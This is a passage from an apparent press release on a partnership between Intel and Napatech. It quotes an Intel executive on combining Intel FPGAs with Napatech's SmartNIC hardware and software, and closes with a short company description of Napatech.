and General Manager, Network Business Division at Intel. "The combination of our FPGAs, which deliver high performance, and power efficiency plus a rich feature set for the most demanding applications, together with Napatech's production-grade hardware and software, helps ensure that customers can deliver leading solutions for a wide range of enterprise and telecom applications." About Napatech Napatech is the leading supplier of SmartNIC solutions used in cloud, enterprise, and telecom datacenters. Through commercial-grade software suites integrated with high-performance hardware, Napatech accelerates network infrastructure and security workloads to deliver best-in-class system-level performance while maximizing the availability of server compute resources for applications and services.

Read More

Events

ICVARS 2024

Conference

ICVARS 2024

Conference